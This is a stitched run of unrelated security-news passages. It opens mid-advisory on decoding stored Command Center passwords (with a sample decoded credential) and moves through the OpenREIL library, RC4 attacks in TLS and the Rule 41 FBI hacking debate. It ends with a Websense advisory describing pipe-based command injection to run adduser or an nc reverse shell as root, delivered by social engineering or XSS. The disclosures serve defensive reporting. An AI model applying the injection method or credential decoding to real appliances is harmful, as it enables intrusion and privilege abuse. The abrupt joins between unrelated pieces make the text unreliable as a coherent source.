The algorithm used can be found in the JAR file NmsServerClasses.jar. For example the encoded password C70A0eE9os9T2z decodes to SECURIFY123. The credentials stored in these files can than be used to gain privileged access to devices managed by Command Center.

OpenREIL is open source library that implements translator and tools for REIL (Reverse Engineering Intermediate Language). REIL was initially developed by Zynamics as part of their BinNavi framework, proprietary code analysis software written in Java. To learn more about REIL read the following documents: «REIL ? The Reverse Engineering Intermediate Language» (link) «The REIL language» (part 1, part 2, part 3, part 4) «Applications of the Reverse Engineering Language REIL» (PDF) «REIL: A platform-independent intermediate representation of disassembled code for static code analysis» (PDF) However, after Zynamics was acquired by Google they abandoned BinNavi, so, I decided to develop my own implementation of REIL. I made it relatively small and portable in comparison with original, the translator itself is just a single library written in C++, it can be statically linked with any program for static or dynamic code analysis. The higher level API of OpenREIL is written in Python, so, it can be easily utilized in plugins and scripts for your favourite reverse engineering tool (almost all modern debuggers and disassemblers has Python bindings). OpenREIL is not a 100% compatible with Zynamics REIL, it has the same ideology and basics, but there's some changes in IR instruction set and representation of the traget hardware platform features. OpenREIL is based on my custom fork of libasmir ? IR translation library from old versions of BAP framework. I removed some 3-rd party dependencies of libasmir (libbfd, libopcodes) and features that irrelevant to translation itself (binary files parsing, traces processing, etc.), than I did some minor refactoring/bugfixes, switched to Capstone for instruction length disassembling and implemented BAP IR ? REIL translation logic on the top of libasmir. Because libasmir uses VEX (production-quality library, part of Valgrind), full code translation sequence inside of OpenREIL is looks as binary ? VEX IR ? BAP IR ? REIL. It's kinda ugly from engineering point of view, but it allows us to have a pretty robust and reliable support of all general instructions of x86. Current version of OpenREIL still has no support of other architectures, but I'm working on x86_64 and ARMv5. Security researchers have banged another nail into the coffin of the ageing RC4 encryption algorithm. The latest password recovery attacks against RC4 in TLS by Christina Garman of Johns Hopkins University, Prof. Kenny Paterson and research student Thyla van der Merwe (both of Royal Holloway, University of London) show that attacks against the scheme are getting better and easier so RC4 "needs to die", as the researchers themselves put it. The continued use of RC4 in TLS is "increasingly indefensible", the researchers conclude in an abstract of their work. The research - which also involved the development of "proof of concept" implementations of the attacks against the BasicAuth and IMAP protocols – is explained in full in a paper here (PDF, 34 pages). Independent researchers agree that RC4 needs to be pensioned off even though some question whether the attack developed by is a practical concern. "RC4 must die. Despite, not because of, attacks like the one described here which is extremely impractical," said Martijn Grooten, editor of Virus Bulletin and occasional security researcher. Caveats about whether or not attacks could be economically pulled off aside, there's little or no disagreement about the direction of travel, which is that the cipher ought to be consigned straight towards the cyber equivalent of Boot Hill cemetery. The only reason it's still around is that websites are reluctant to drop support even for obsolete technology. RC4, developed in 1987, is a popular stream cipher that's often used in HTTPS connections to protect sensitive network traffic from eavesdroppers, among other uses. Potential attacks have been documented for years but they are now decreasing in complexity to the point where using the cipher is risky even before considering the implication of the revelations from NSA whistleblower Edward Snowden. Leaks from Snowden suggested that US and UK spies have developed "groundbreaking cryptanalysis capabilities", which ultimately allow the intelligence agencies to break RC4 encryption. Distrust of the cipher is spreading. Microsoft urged Windows developers to ditch the RC4 encryption algorithm and pick something stronger back in November 2013. Cisco also told its customers to "avoid" the cipher around the same time. The IETF moved towards killing off the venerable-but-vulnerable RC4 cipher with a proposal that net-standard clients and servers need to quit using RC4 in Transport Layer Security (TLS) that surfaced in December 2014. The Judicial Conference Advisory Committee on Criminal Rules voted 11-1 to modify a federal rule – known as Rule 41 – that expands hacking authority for the FBI, the National Journal reported on Monday, citing a Department of Justice (DOJ) spokesperson. As the rule stands, judges can only approve search warrants for materials within their own judicial district – modified, courts would have the ability to grant search warrants for electronic information located outside their judicial district, the report indicates. A variety of organizations – including Google and a number of other civil rights and civil liberties groups – have spoken out against the proposal, but David Bitkower, deputy assistant attorney general of the Criminal Division in the Justice Department, defended it in a December 2014 memo. Bitkower wrote that “the proposed amendment would ensure that a court has jurisdiction to issue a search warrant in two categories of investigations involving modern Internet crime: cases involving botnets and cases involving Internet anonymizing techniques.” He went on to say, “The proposal would not authorize the government to undertake any search or seizure or use any remote search technique not already permitted under current law. As with all search warrant applications, such concerns must ultimately be resolved through judicial determination on a case-by-case basis.” Google responded in February with comments written by Richard Salgado, director of law enforcement and information security with Google. Salgado took issue that the amendment makes it so the government may use “remote access” to search and seize or copy electronic data, stating that the wording is too vague and does not specify how searches will be conducted and what may be searched. “The term “remote access” is not defined,” Salgado wrote. “Sample search warrants submitted by the DOJ to the Committee indicate that “remote access” may involve network investigative techniques, or NITs, which include, for example, the installation of software onto a target device to extract and make available to law enforcement certain information from the device, including IP address, MAC address, and other identifying information.” Salgado went on to add, “In short, “remote access” seems to authorize government hacking of any facility wherever located,” and later wrote that the amendment would authorize remote searches of millions of computers because, according to the FBI, botnets can grow to include of a large number of computers. The Electronic Frontier Foundation (EFF) shared in Google's concerns. In a comment emailed to SCMagazine.com on Tuesday, Hanni Fakhoury, EFF senior staff attorney, called the amendment a substantive legal change masquerading as a mere procedural rule change. “That is, by seeking to change the procedural rules about how the government can execute remote searches (which in essence means how they can deploy malware), the government is essentially pushing for approval of the idea that it should have the power to deploy malware and execute remote searches,” Fakhoury said. “To us, it seems like that's a decision Congress should make.” Piggybacking on that idea, Nathan Freed Wessler, staff attorney with the American Civil Liberties Union (ACLU), said in a comment emailed to SCMagazine.com on Tuesday that the amendment expands the government's ability to use malware and zero-day exploits, and without imposing necessary protections. “The current proposal fails to strike the right balance between safeguarding privacy and internet security and allowing the government to investigate crimes,” Freed said. The National Journal report indicated that a number of other steps must a occur before the changes are made official, and the process could take longer than a year. The Websense Appliance Manager GUI has a web-based 'command line utility' that provides the ability to execute various network debugging commands, which can be run on any module; Appliance Controller, Content Gateway, Web Security, Network Agent, Email Security Gateway. This command line utility is affected by command injection that allows an attacker to execute arbitrary code on the appliance. This issue can be combined with other vulnerabilities, like Cross-Site Scripting, to perform a remote unauthenticated attacks to compromise the appliance. Details The CommandLineServlet Java Servlet is responsible for enforcing limitations on the type of network debugging commands users are allowed to run using the GUI. An attacker is able to bypass these limitations by breaking out of any network diagnostics command that requires a second parameter (in this example Destination). This allows the attacker to inject arbitrary system commands. For example, the pipe character (|) is used to redirect the output from one process into the input of another, enabling multiple commands to be chained together. An attacker can leverage this behavior to execute any available system command (such as adduser or nc to start a reverse shell). The output is returned to the user, the commands are executed with elevated privileges (root). With a little help of social engineering (like sending a link via email/chat), an attacker may trick authenticated users to execute arbitrary commands on behalf of the attacker. A more effective attack would be to abuse other Websense vulnerabilities like Cross-Site Scripting.
